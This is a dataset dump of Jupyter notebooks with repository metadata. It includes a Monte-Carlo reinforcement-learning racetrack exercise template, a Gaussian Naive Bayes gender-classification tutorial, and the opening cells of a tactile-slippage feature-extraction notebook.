36_text.models.qrnn.ipynb.\nConverted 37_text.learner.ipynb.\nConverted 38_tutorial.text.ipynb.\nConverted 39_tutorial.transformers.ipynb.\nConverted 40_tabular.core.ipynb.\nConverted 41_tabular.data.ipynb.\nConverted 42_tabular.model.ipynb.\nConverted 43_tabular.learner.ipynb.\nConverted 44_tutorial.tabular.ipynb.\nConverted 45_collab.ipynb.\nConverted 46_tutorial.collab.ipynb.\nConverted 50_tutorial.datablock.ipynb.\nConverted 60_medical.imaging.ipynb.\nConverted 61_tutorial.medical_imaging.ipynb.\nConverted 65_medical.text.ipynb.\nConverted 70_callback.wandb.ipynb.\nConverted 71_callback.tensorboard.ipynb.\nConverted 72_callback.neptune.ipynb.\nConverted 73_callback.captum.ipynb.\nConverted 74_callback.azureml.ipynb.\nConverted 97_test_utils.ipynb.\nConverted 99_pytorch_doc.ipynb.\nConverted dev-setup.ipynb.\nConverted index.ipynb.\nConverted quick_start.ipynb.\nConverted tutorial.ipynb.\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
e707a4543e920c14136483828aeb8095fcf3e295 | 32,184 | ipynb | Jupyter Notebook | exercises/templates/ex04/Monte-Carlo_Methods.ipynb | adilsheraz/reinforcement_learning_course_materials | e086ae7dcee2a0c1dbb329c2b25cf583c339c75a | [
"MIT"
] | 557 | 2020-07-20T08:38:15.000Z | 2022-03-31T19:30:35.000Z | exercises/templates/ex04/Monte-Carlo_Methods.ipynb | BochraCHEMAM/reinforcement_learning_course_materials | 09a211da5707ba61cd653ab9f2a899b08357d6a3 | [
"MIT"
] | 7 | 2020-07-22T07:27:55.000Z | 2021-05-12T14:37:08.000Z | exercises/templates/ex04/Monte-Carlo_Methods.ipynb | BochraCHEMAM/reinforcement_learning_course_materials | 09a211da5707ba61cd653ab9f2a899b08357d6a3 | [
"MIT"
] | 115 | 2020-09-08T17:12:25.000Z | 2022-03-31T18:13:08.000Z | 30.709924 | 410 | 0.567922 | [
[
[
"# Exercise 04): Monte-Carlo Methods\n\nIn this exercise we make use of the racetrack environment (racetrack_environment.py) to test Monte-Carlo methods.\n\nThe racetrack environment is based on the OpenAI Gym interface (https://gym.openai.com/) depicted in the picture below.\n\n\n\n(Source: Wiki, https://www.vecteezy.com/free-vector/car)\n\nThe agent can send an action to the system - our racetrack env - using the `env.step(action)` function to drive the car in the environment which is given by the following racetrack: \n\n\n\nHere, the red line represents the start line and the goal is to move the car within the yellow course to the white finish line without hitting the wall. \nIf the car hits the wall, it will be reset to the start line. \nThe information we get from the step function of the environment are\n- state consisting of the y- and x-postion (`p_y` and `p_x`) and the velocity in x- and y-direction (`v_y` and `v_x`),\n- `reward`, which will be -1 per step,\n- `done`-flag which indicates if the environment is terminated (in our case if the car has reached the finish line),\n- info (addioninal information, not used here).\n\nOur possible actions are to accelerate the car into x- and/or y-direction (positiv or negativ) or do nothing.\n\nAccelerate the car will result in chaning the velocity of the car as follows:\n\n\nBreaking the car will result in chaning the velocity of the car as follows:\n\n\nOur possible action-space is therefore `[-1, 0, 1]` which are availabe as tuple or integer number and encoded as exmplained later on.\n\nActions (accelerations in given directions) are encoded according from integer (`a`) to tuple (`a_y`, `a_x`) using the follwoing equations:\n\n- `a_y = a//3-1`\n- `a_x = a%3-1`\n\nThis is shown in the following diagram:\n\n\n\nPlease make yourself more familiar with the used environment (racetrack_environment.py) for more informations.",
"_____no_output_____"
],
[
"For the start, please execute the following cells.\n",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport random\nimport sys\nfrom racetrack_environment import RaceTrackEnv\nimport matplotlib.pyplot as plt\nfrom tqdm.notebook import tqdm\nplt.style.use('dark_background')",
"_____no_output_____"
]
],
[
[
"Execute the follwoing cell to built a race track using the `RaceTrackEnv` as a test scenario. ",
"_____no_output_____"
]
],
[
[
"# Build the course\n_course_dim = (8, 10)\n_inner_wall_dim = (2, 6)\n\ndef build_uturn_course(course_dim, inner_wall_dim):\n \"\"\"\n Build a race track for the u-turn street scenario.\n Start and finish line are placed in the center top and bottom respectively. The course dimension specifications\n do not consider a bounding wall around the track, which is inserted additionally. \n\n \"\"\"\n track = []\n wall_up_bound = course_dim[0]//2 - inner_wall_dim[0] // 2\n wall_bottom_bound = course_dim[0]//2 + inner_wall_dim[0]//2\n street_width = course_dim[1]//2 - inner_wall_dim[1]//2\n # construct course line by line\n for i in range(course_dim[0]):\n if i < wall_up_bound:\n half_street_len = course_dim[1]//2 - 1\n track_row = 'W'*(half_street_len//2+1) + 'W-' + 'o'*(half_street_len-1+half_street_len//2)\n elif wall_up_bound <= i < wall_bottom_bound:\n track_row = 'W'*street_width + 'W'*inner_wall_dim[1] + 'o'*street_width\n else:\n track_row = 'W'*(half_street_len//2+1) + 'W+' + 'o'*(half_street_len-1+half_street_len//2)\n track.append(track_row)\n # add boundary\n track = ['W'*course_dim[1]] + track + ['W'*course_dim[1]]\n track = ['W'+s+'W' for s in track]\n return track\n \ncourse = build_uturn_course(_course_dim, _inner_wall_dim)\ntrack = RaceTrackEnv(course)\nfor row in course:\n print(row)\n \npos_map = track.course # overlay track course\nplt.imshow(pos_map, cmap='hot', interpolation='nearest')\nplt.show()",
"_____no_output_____"
]
],
[
[
"## 1) Monte-Carlo-Based Policy Evaluation",
"_____no_output_____"
],
[
"Write a first-visit Monte-Carlo algorithm to evaluate the dummy policy as defined below on the U-turn course. The dummy policy turns the car to the right as soon as it stands in front of a wall. Try to understand how the policy works before you start to code. \n\nHow can we interprete the state values resulting from the evaluation with first-visit Monte-Carlo?",
"_____no_output_____"
],
[
"## 1) Solution",
"_____no_output_____"
],
[
"Algorithm given below.\n\nThe simple and deterministic dummy policy will always guarantee the car to reach the finish line. Thus, the state values can be interpreted as the number of timesteps that is necessary to reach the goal from that specific state (i.e. position and velocity) if we are following the policy.",
"_____no_output_____"
]
],
[
[
"### Select course and initialize dummy policy\n\ncourse = build_uturn_course(_course_dim, _inner_wall_dim)\ntrack = RaceTrackEnv(course)\ndummy_slow_pi = np.ones([track.bounds[0], track.bounds[1], 1+2*track.MAX_VELOCITY, 1+2*track.MAX_VELOCITY]) * 4 \n\ndummy_slow_pi[:track.bounds[0]//2, :, 0 , 0] = 5 # go right\ndummy_slow_pi[:track.bounds[0]//2, -2:, 0 , :] = 6 # go bottom left\ndummy_slow_pi[-2:, track.bounds[1]//2:, : , 0] = 0 # go top left\n\npi = dummy_slow_pi",
"_____no_output_____"
],
[
"# initialize the value function\nvalues = np.zeros([track.bounds[0], track.bounds[1], 1+2*track.MAX_VELOCITY, 1+2*track.MAX_VELOCITY])\n\n# initialize an empty dict to count the number of visits\nn_dict = {}\n\n# configuration parameters\ngamma = 1 # discount factor\nno_episodes = 500 # number of evaluated episodes\nno_steps = 2000 # number of allowed timesteps per episode\n\nfor e in tqdm(range(no_episodes), position=0, leave=True):\n \n # initialize variables in which collected data will be stored\n states = [] # list of tuples\n rewards = [] # list of floats\n visited_states = set() # set of tuples\n first_visit_list = [] # list of booleans\n \n # YOUR CODE HERE\n raise NotImplementedError()\n",
"_____no_output_____"
]
],
[
[
"To visualize the result of the evaluation, plot the state values as a function of **position only** (so that you get a two dimensional representation of the state value) and in the form of a tabular represenation and a heatmap. In order to omit dependence of the velocity dimensions, use the minimum of the value function with respect to the velocities.",
"_____no_output_____"
]
],
[
[
"def text_print_pos_map(_pos_map):\n for row in _pos_map:\n print(' '.join(x_size*['{}']).format(*[str(int(r)).zfill(3) for r in row]))\n \ndef plot_pos_map(_pos_map):\n plt.imshow(_pos_map, cmap='hot', interpolation='nearest')\n plt.show()\n\n# calculate minimum value with respect to velocities\nx_size, y_size = len(course[0]), len(course)\npos_map = np.zeros((y_size, x_size))\n\nfor s_x in range(x_size):\n for s_y in range(y_size):\n pos_map[s_y, s_x] = np.min(values[s_y, s_x, :, :])\n \ntext_print_pos_map(pos_map)\nplot_pos_map(-pos_map)",
"_____no_output_____"
]
],
[
[
"## 2) On-Policy $\\varepsilon$-Greedy Control",
"_____no_output_____"
],
[
"Starting with the previously used turn-right-if-wall dummy policy, write an on-policy Monte-Carlo based first-visit $\\varepsilon$-greedy control algorithm to solve the U-turn course. The policy is now stochastic: it does not contain simple action commands for each state, but probabilities for each possible action. Again, please make sure to understand how the stochastic policy works before coding.\n\n\nMake sure to implement an upper bound for episode length (we suggest a boundary of 200 steps). Why do we need a bound like this? What happens to the state values / state-action values if we increase the bound?",
"_____no_output_____"
],
[
"## 2) Solution",
"_____no_output_____"
],
[
"YOUR ANSWER HERE",
"_____no_output_____"
]
],
[
[
"# dummy policy\ncourse = build_uturn_course(_course_dim, _inner_wall_dim)\ntrack = RaceTrackEnv(course)\n\ndummy_slow_stoch_pi = np.zeros([track.bounds[0], track.bounds[1], 1+2*track.MAX_VELOCITY, 1+2*track.MAX_VELOCITY, 9])\n\ndummy_slow_stoch_pi[ :, :, :, :, 4] = 1 # set probability of doing nothing to one for every state\n\n# set probability to go right:\ndummy_slow_stoch_pi[:track.bounds[0]//2, :, 0 , 0, 5] = 1 \n# set probability to do nothing where we want to go right:\ndummy_slow_stoch_pi[:track.bounds[0]//2, :, 0 , 0, 4] = 0 \n\ndummy_slow_stoch_pi[:track.bounds[0]//2, -2:, 0 , :, 6] = 1 # probability to go bottom left\ndummy_slow_stoch_pi[:track.bounds[0]//2, -2:, 0 , :, 4] = 0 \n\ndummy_slow_stoch_pi[-2:, track.bounds[1]//2:, : , 0, 0] = 1 # probability to go top left\ndummy_slow_stoch_pi[-2:, track.bounds[1]//2:, : , 0, 4] = 0 \n\npi = dummy_slow_stoch_pi ",
"_____no_output_____"
],
[
"# initialize action_values and counting dict\naction_values = np.zeros([track.bounds[0], track.bounds[1], 1+2*track.MAX_VELOCITY, 1+2*track.MAX_VELOCITY, 3, 3])\nn_dict = {}\n\n# configuration parameters\nepsilon = 0.1 # exploration probability\ngamma = 1 # discount factor\nno_episodes = 5000 # number of evaluated episodes\nno_steps = 200 # number of evaluated timesteps per episode\n\n\ntrack = RaceTrackEnv(course)\nx_size, y_size = len(course[0]), len(course)\n\nfor e in tqdm(range(no_episodes), desc='episode', mininterval=2):\n \n # initialize variables in which collected data will be stored\n action_states = [] # list of tuples\n rewards = [] # list of floats\n visited_action_states = set() # set of tuples\n first_visit_list = [] # list of booleans\n \n pos_map = np.zeros((y_size, x_size)) # initializes a map that can be plotted\n \n # YOUR CODE HERE\n raise NotImplementedError()\n \n # this code fragment is to plot the sampled map, comment out for faster computation\n print('Sample trajectory on learned policy in episode {}:'.format(e))\n pos_map = (pos_map > 0).astype(np.float32)\n pos_map += track.course # overlay track course\n plot_pos_map(pos_map)",
"_____no_output_____"
]
],
[
[
"Use the code block directly below to test the resulting deterministic greedy policy (several samples are taken in order to show behavior in all different starting positions).",
"_____no_output_____"
]
],
[
[
"no_episodes = 10\nfor e in range(no_episodes):\n \n pos_map = np.zeros((y_size, x_size))\n p, v = track.reset()\n for k in range(200):\n s_y, s_x = p[0], p[1]\n s_vy, s_vx = v[0], v[1]\n \n pos_map[s_y, s_x] += 1 # exploration map\n \n action = np.argmax(pi[s_y, s_x, s_vy, s_vx])\n a = track.action_to_tuple(action)\n action_state = track.state_action((p, v), a)\n\n (p, v), reward, done, _ = track.step(a)\n\n if done:\n break \n\n print('Sample trajectory on learned policy in episode {}:'.format(e))\n pos_map = (pos_map > 0).astype(np.int16)\n pos_map += track.course # overlay track course\n plot_pos_map(pos_map)",
"_____no_output_____"
]
],
[
[
"## 3) Off-Policy $\\varepsilon$-Greedy Control",
"_____no_output_____"
],
[
"Using the dummy-policy from 2) as a behavior policy, write an off-policy Monte-Carlo algorithm with weighted importance sampling.\n\nHas the result gotten better or worse? Why?",
"_____no_output_____"
],
[
"## 3) Solution",
"_____no_output_____"
],
[
"YOUR ANSWER HERE",
"_____no_output_____"
]
],
[
[
"### Dummy Policy\ncourse = build_uturn_course(_course_dim, _inner_wall_dim)\ntrack = RaceTrackEnv(course)\ndummy_slow_stoch_pi = np.zeros([track.bounds[0], track.bounds[1], 1+2*track.MAX_VELOCITY, 1+2*track.MAX_VELOCITY, 9])\n\n# as the behavior policy is not alternated, there is no possibility to implement the epsilon parameter later\n# hence, we need to implemented it right here\nepsilon = 0.1\n\ndummy_slow_stoch_pi[ :, :, :, :, 4] = 1 - epsilon + epsilon / 9\nfor i in range(9):\n if i != 4:\n dummy_slow_stoch_pi[ :, :, :, :, i] = epsilon / 9\n \ndummy_slow_stoch_pi[:track.bounds[0]//2, :, 0 , 0, 5] = 1-epsilon + epsilon/9\ndummy_slow_stoch_pi[:track.bounds[0]//2, :, 0 , 0, 4] = epsilon / 9\n\ndummy_slow_stoch_pi[:track.bounds[0]//2, -2:, 0 , :, 6] = 1-epsilon + epsilon/9\ndummy_slow_stoch_pi[:track.bounds[0]//2, -2:, 0 , :, 4] = epsilon / 9\n\ndummy_slow_stoch_pi[-2:, track.bounds[1]//2:, : , 0, 0] = 1-epsilon + epsilon/9\ndummy_slow_stoch_pi[-2:, track.bounds[1]//2:, : , 0, 4] = epsilon / 9\n\nbehavior_policy = dummy_slow_stoch_pi \n\npi = np.copy(behavior_policy)",
"_____no_output_____"
],
[
"# initialize action_values and dict of cumulated WIS weights\naction_values = np.zeros([track.bounds[0], track.bounds[1], 1+2*track.MAX_VELOCITY, 1+2*track.MAX_VELOCITY, 3, 3])\nc_dict = {}\n\n# configuration parameters\n# epsilon = 0.1 was defined within the behavior policy\ngamma = 1 # discount factor\nno_episodes = 1000 # number of evaluated episodes\nno_steps = 200 # number of evaluated timesteps per episode\n\ncourse = course\ntrack = RaceTrackEnv(course)\nx_size, y_size = len(course[0]), len(course)\n\nfor e in tqdm(range(no_episodes), desc='episode', mininterval=2):\n \n action_states = []\n actions = []\n rewards = []\n \n pos_map = np.zeros((y_size, x_size))\n \n # YOUR CODE HERE\n raise NotImplementedError()\n \n # code fragment for plotting \n pos_map = (pos_map > 0).astype(np.float32)\n pos_map += track.course # overlay track course\n print('Sample trajectory on learned policy in episode {}:'.format(e))\n plot_pos_map(pos_map)",
"_____no_output_____"
],
[
"episodes = 10\nfor e in range(episodes):\n \n pos_map = np.zeros((y_size, x_size))\n p, v = track.reset()\n for k in range(200):\n s_y, s_x = p[0], p[1]\n s_vy, s_vx = v[0], v[1]\n \n pos_map[s_y, s_x] += 1 # exploration map\n \n action = np.argmax(pi[s_y, s_x, s_vy, s_vx])\n \n a = track.action_to_tuple(action)\n action_state = track.state_action((p, v), a)\n\n (p, v), reward, done, _ = track.step(a)\n\n if done:\n print('Done')\n break \n\n \n print('Sample trajectory on learned policy in episode {}:'.format(e))\n pos_map = (pos_map > 0).astype(np.int16)\n pos_map += track.course # overlay track course\n plot_pos_map(pos_map)",
"_____no_output_____"
]
],
[
[
"## 4) Extra Challenge: A More Complex Course",
"_____no_output_____"
],
[
"The course given below poses a substantially harder challenge for Monte-Carlo based algorithms. Why? If you want to try solving it yourself, be aware that it may take much longer until a successful policy is found.",
"_____no_output_____"
]
],
[
[
"# Build the course\n_course_dim = (8, 10)\n_inner_wall_dim = (2, 6)\n\ndef build_rect_course(course_dim, inner_wall_dim):\n \"\"\"\n Build a race track given specifications for the outer cyclic street and inner wall dimensions.\n Start and finish line should be placed in the center top. The course dimension specifications\n do not consider a bounding wall around the track, which must be inserted additionally.\n \n Args:\n course_dim: 2-tuple, (y-dim, x-dim): The size of the track without outer walls.\n inner_wall_dim: 2-tuple (y-dim, x-dim): The size of the inner wall\n \n \"\"\"\n track = []\n wall_up_bound = course_dim[0]//2 - inner_wall_dim[0] // 2\n wall_bottom_bound = course_dim[0]//2 + inner_wall_dim[0]//2\n street_width = course_dim[1]//2 - inner_wall_dim[1]//2\n # construct course line by line\n for i in range(course_dim[0]):\n if i < wall_up_bound:\n half_street_len = course_dim[1]//2 - 1\n track_row = 'o'*half_street_len + '+W-' + 'o'*(half_street_len-1)\n elif wall_up_bound <= i < wall_bottom_bound:\n track_row = 'o'*street_width + 'W'*inner_wall_dim[1] + 'o'*street_width\n else:\n track_row = 'o'*course_dim[1]\n track.append(track_row)\n # add boundary\n track = ['W'*course_dim[1]] + track + ['W'*course_dim[1]]\n track = ['W'+s+'W' for s in track]\n return track\n \ncourse = build_rect_course(_course_dim, _inner_wall_dim)\ntrack = RaceTrackEnv(course)\nfor row in course:\n print(row)\n \npos_map = track.course # overlay track course\nplot_pos_map(pos_map)",
"_____no_output_____"
]
],
[
[
"## 4) Solution",
"_____no_output_____"
],
[
"YOUR ANSWER HERE",
"_____no_output_____"
],
[
"YOUR ANSWER HERE",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
]
] |
e707a7c3a7b0b16b03996b2e105568841b653614 | 27,286 | ipynb | Jupyter Notebook | Naive Bayes.ipynb | aihubprojects/Machine-Learning-From-Scratch | 8deba5ea0ad438eb06b3ddcb1cd70e5a59672dc3 | [
"MIT"
] | 4 | 2020-09-17T05:25:34.000Z | 2021-01-05T10:35:45.000Z | Naive Bayes.ipynb | aihubprojects/Machine-Learning-From-Scratch | 8deba5ea0ad438eb06b3ddcb1cd70e5a59672dc3 | [
"MIT"
] | null | null | null | Naive Bayes.ipynb | aihubprojects/Machine-Learning-From-Scratch | 8deba5ea0ad438eb06b3ddcb1cd70e5a59672dc3 | [
"MIT"
] | 3 | 2020-11-13T03:23:35.000Z | 2021-06-05T14:03:52.000Z | 36.044914 | 6,800 | 0.550502 | [
[
[
"import pandas as pd\nimport numpy as np\n\n# Create an empty dataframe\ndata = pd.DataFrame()\n\n# Create our target variable\ndata['Gender'] = ['male','male','male','male','female','female','female','female']\n\n# Create our feature variables\ndata['Height'] = [6,5.92,5.58,5.92,5,5.5,5.42,5.75]\ndata['Weight'] = [180,190,170,165,100,150,130,150]\ndata['Foot_Size'] = [12,11,12,10,6,8,7,9]\n\n# View the data\ndata",
"_____no_output_____"
],
[
"# Create an empty dataframe\nperson = pd.DataFrame()\n\n# Create some feature values for this single row\nperson['Height'] = [6]\nperson['Weight'] = [130]\nperson['Foot_Size'] = [8]\n\n# View the data \nperson",
"_____no_output_____"
]
],
[
[
"# Calculate Priors",
"_____no_output_____"
]
],
[
[
"# Number of males\nn_male = data['Gender'][data['Gender'] == 'male'].count()\n\n# Number of males\nn_female = data['Gender'][data['Gender'] == 'female'].count()\n\n# Total rows\ntotal_ppl = data['Gender'].count()",
"_____no_output_____"
],
[
"# Number of males divided by the total rows\nP_male = n_male/total_ppl\n\n# Number of females divided by the total rows\nP_female = n_female/total_ppl",
"_____no_output_____"
]
],
[
[
"# Calculate Likelihood",
"_____no_output_____"
]
],
[
[
"# Group the data by gender and calculate the means of each feature\ndata_means = data.groupby('Gender').mean()\n\n# View the values\ndata_means",
"_____no_output_____"
],
[
"# Group the data by gender and calculate the variance of each feature\ndata_variance = data.groupby('Gender').var()\n\n# View the values\ndata_variance",
"_____no_output_____"
],
[
"# Means for male\nmale_height_mean = data_means['Height'][data_variance.index == 'male'].values[0]\nmale_weight_mean = data_means['Weight'][data_variance.index == 'male'].values[0]\nmale_footsize_mean = data_means['Foot_Size'][data_variance.index == 'male'].values[0]\n\n# Variance for male\nmale_height_variance = data_variance['Height'][data_variance.index == 'male'].values[0]\nmale_weight_variance = data_variance['Weight'][data_variance.index == 'male'].values[0]\nmale_footsize_variance = data_variance['Foot_Size'][data_variance.index == 'male'].values[0]\n\n# Means for female\nfemale_height_mean = data_means['Height'][data_variance.index == 'female'].values[0]\nfemale_weight_mean = data_means['Weight'][data_variance.index == 'female'].values[0]\nfemale_footsize_mean = data_means['Foot_Size'][data_variance.index == 'female'].values[0]\n\n# Variance for female\nfemale_height_variance = data_variance['Height'][data_variance.index == 'female'].values[0]\nfemale_weight_variance = data_variance['Weight'][data_variance.index == 'female'].values[0]\nfemale_footsize_variance = data_variance['Foot_Size'][data_variance.index == 'female'].values[0]",
"_____no_output_____"
],
[
"# Create a function that calculates p(x | y):\ndef p_x_given_y(x, mean_y, variance_y):\n\n # Input the arguments into a probability density function\n p = 1/(np.sqrt(2*np.pi*variance_y)) * np.exp((-(x-mean_y)**2)/(2*variance_y))\n \n # return p\n return p",
"_____no_output_____"
],
[
"# Numerator of the posterior if the unclassified observation is a male\nP_male * \\\np_x_given_y(person['Height'][0], male_height_mean, male_height_variance) * \\\np_x_given_y(person['Weight'][0], male_weight_mean, male_weight_variance) * \\\np_x_given_y(person['Foot_Size'][0], male_footsize_mean, male_footsize_variance)",
"_____no_output_____"
],
[
"# Numerator of the posterior if the unclassified observation is a female\nP_female * \\\np_x_given_y(person['Height'][0], female_height_mean, female_height_variance) * \\\np_x_given_y(person['Weight'][0], female_weight_mean, female_weight_variance) * \\\np_x_given_y(person['Foot_Size'][0], female_footsize_mean, female_footsize_variance)",
"_____no_output_____"
]
],
[
[
"# FROM SCRATCH",
"_____no_output_____"
]
],
[
[
"data = pd.DataFrame()\n\n# Create our target variable\ndata['Gender'] = [1,1,1,1,0,0,0,0]\n\n# Create our feature variables\ndata['Height'] = [6,5.92,5.58,5.92,5,5.5,5.42,5.75]\ndata['Weight'] = [180,190,170,165,100,150,130,150]\ndata['Foot_Size'] = [12,11,12,10,6,8,7,9]\n\ndata",
"_____no_output_____"
],
[
"X = data.drop(['Gender'],axis=1) \ny=data.Gender\n\n \n# splitting X and y into training and testing sets\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=1)\n \n# training the model on training set\nfrom sklearn.naive_bayes import GaussianNB\ngnb = GaussianNB()\ngnb.fit(X_train, y_train)\n \n# making predictions on the testing set\ny_pred = gnb.predict(X_test)\n",
"_____no_output_____"
],
[
"\nfrom sklearn.metrics import classification_report, confusion_matrix\nprint(classification_report(y, gnb.predict(X)))",
" precision recall f1-score support\n\n 0 0.80 1.00 0.89 4\n 1 1.00 0.75 0.86 4\n\n accuracy 0.88 8\n macro avg 0.90 0.88 0.87 8\nweighted avg 0.90 0.88 0.87 8\n\n"
],
[
"cm = confusion_matrix(y, gnb.predict(X))\n\nfig, ax = plt.subplots(figsize=(8, 8))\nax.imshow(cm)\nax.grid(False)\nax.xaxis.set(ticks=(0, 1), ticklabels=('Predicted 0s', 'Predicted 1s'))\nax.yaxis.set(ticks=(0, 1), ticklabels=('Actual 0s', 'Actual 1s'))\nax.set_ylim(1.5, -0.5)\nfor i in range(2):\n for j in range(2):\n ax.text(j, i, cm[i, j], ha='center', va='center', color='red')\nplt.show()",
"_____no_output_____"
],
[
"# Create our target variable\ndata1 = pd.DataFrame()\n# Create our feature variables\ndata1['Height'] = [6]\ndata1['Weight'] = [130]\ndata1['Foot_Size'] = [8]\ny_pred = gnb.predict(data1)\nif y_pred==0:\n print (\"female\")\nelse:\n print (\"male\")",
"female\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
e707b1117078d8cf40bdf974cf4da7708800648b | 164,734 | ipynb | Jupyter Notebook | MLslippagesrc/MLslippage/FeatExplained.ipynb | jagrio/MachineLearningSlippage | 357259e4635f01605b12797a3caaee594375674d | [
"BSD-3-Clause"
] | 1 | 2021-02-10T15:52:19.000Z | 2021-02-10T15:52:19.000Z | MLslippagesrc/MLslippage/FeatExplained.ipynb | jagrio/MachineLearningSlippage | 357259e4635f01605b12797a3caaee594375674d | [
"BSD-3-Clause"
] | null | null | null | MLslippagesrc/MLslippage/FeatExplained.ipynb | jagrio/MachineLearningSlippage | 357259e4635f01605b12797a3caaee594375674d | [
"BSD-3-Clause"
] | null | null | null | 69.361684 | 21,058 | 0.688971 | [
[
[
"\"\"\"Mainly Edited for private usage by: Ioanna Mitsioni\n Ioannis Agriomallos\nLicense: BSD 3 clause\n\"\"\"\nimport time\nstart_time = time.time()\nfrom copy import deepcopy, copy\nimport math\nimport scipy.io as sio\nimport shutil\nimport os\nfrom random import shuffle\nimport numpy as np\nfrom pylab import *\n# from featext2 import *\nimport matplotlib.pyplot as plt\n%matplotlib inline \n#matplotlib qt\n# inline (suitable for ipython only, shown inside browser!) or qt (suitable in general, shown in external window!)\nfrom matplotlib.colors import ListedColormap\nfrom mpl_toolkits.mplot3d import Axes3D #, axes3d\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler, normalize\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import TSNE\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.feature_selection import SelectFromModel, SelectKBest, mutual_info_classif\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom collections import OrderedDict\nimport re\nimport datetime\nimport urllib\nimport tarfile\n# import joblib\n# from joblib import Parallel, delayed, Memory\nfrom tempfile import mkdtemp\nimport copy_reg\nimport types\nimport itertools\nfrom itertools import compress\nfrom collections import Counter\nimport glob\n\n#import multiprocessing\ndef _pickle_method(m):\n if m.im_self is None:\n return getattr, (m.im_class, m.im_func.func_name)\n else:\n return getattr, (m.im_self, m.im_func.func_name)\ncopy_reg.pickle(types.MethodType, _pickle_method)\n\n\nh = .2 # step size in the mesh\nwindow = 1024",
"_____no_output_____"
],
[
"############ Feature Names ############\n\"\"\"features: || if \n |--> time domain : || samples = 1024\n |----|---> phinyomark : 11+3{shist} --------------------------> = 14+0.0samples || 14\n |----|---> golz : 10+samples{acrol} --------------------> = 10+1.0samples || 1034\n |--> frequency domain : \n |----|---> phinyomark : 3{arco}+4{mf}+2(samples/2+1){RF,IF} --> = 9+1.0samples || 1033\n |----|---> golz : 2(samples/2+1){AF,PF} ----------------> = 2+1.0samples || 1026\n |----|----------------|-------alltogether---------------------> = 35+3.0samples || numfeat = 3107\n\"\"\"\n## Time Domain Phinyomark feats\nfeatnames = ['intsgnl', 'meanabs', 'meanabsslp', 'ssi', 'var', 'rms', 'rng', 'wavl', 'zerox', 'ssc', 'wamp', \n 'shist1', 'shist2', 'shist3'] # 11+3{shist}\n## Frequency Domain Phinyomark feats\nfeatnames += ['arco1', 'arco2', 'arco3', 'mnf', 'mdf', 'mmnf', 'mmdf'] # 3{arco}+4{mf}\nfeatnames += ['reFFT{:03d}'.format(i) for i in range(window/2+1)] # samples/2+1{RF}\nfeatnames += ['imFFT{:03d}'.format(i) for i in range(window/2+1)] # samples/2+1{IF}\n## Time Domain Golz feats\nfeatnames += ['meanv', 'stdr', 'mx', 'rngx', 'rngy', 'med', 'hjorth', 'sentr', 'se', 'ssk'] # 10\nfeatnames += ['acrol{:04d}'.format(i) for i in range(window)] # samples{acrol}\n## Frequency Domain Golz feats\nfeatnames += ['amFFT{:03d}'.format(i) for i in range(window/2+1)] # samples/2+1{AF}\nfeatnames += ['phFFT{:03d}'.format(i) for i in range(window/2+1)] # samples/2+1{PF}",
"_____no_output_____"
],
[
